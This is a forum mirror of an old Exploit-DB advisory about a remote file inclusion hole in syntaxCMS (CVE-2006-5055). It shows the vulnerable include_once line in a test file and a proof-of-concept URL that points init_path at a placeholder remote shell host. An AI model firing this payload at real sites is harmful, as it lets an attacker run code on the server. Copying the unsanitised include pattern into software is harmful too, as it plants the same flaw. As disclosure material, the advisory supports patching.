- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 2424
- Проверка EDB
-
- Пройдено
- Автор
- MOHAJALI
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2006-5055
- Дата публикации
- 2006-09-24
Код:
Remote File Include in syntaxCMS
Vulnerable File:
0004_init_urls.php
Vulnerable Code:
1 <?php
2 include_once( $init_path . '/init.urls.php' );
3 ?>
PoC:
http://www.poweredbysyntaxcmssite.com/admin/testing/tests/0004_init_urls.php?init_path=http://YourShell?&
Solution:
Remove This File...it's not needed...just used for tests
Found by MoHaJaLi
Greetz to Eddy_BAck0o
# milw0rm.com [2006-09-24]
- Источник
- www.exploit-db.com